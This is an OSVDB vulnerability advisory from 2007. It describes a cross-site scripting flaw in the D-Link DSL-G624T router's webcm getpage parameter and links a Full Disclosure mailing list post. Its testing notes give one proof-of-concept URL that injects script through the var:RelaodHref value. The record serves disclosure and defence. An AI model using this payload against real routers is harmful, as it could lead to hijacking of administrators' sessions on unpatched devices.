D-Link DSL-G624T webcm getpage Variable XSS

2007-05-02T02:48:01
ID: OSVDB:36159
Type: osvdb
Reporter: OSVDB
Modified: 2007-05-02T02:48:01

Description

Manual Testing Notes

http://192.168.1.1/cgi-bin/webcm?getpage=../html/home/home_RelaodHref.htm&var:RelaodHref=a"%20==%20"a"){alert("XSS")}}</script>

References:

Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0056.html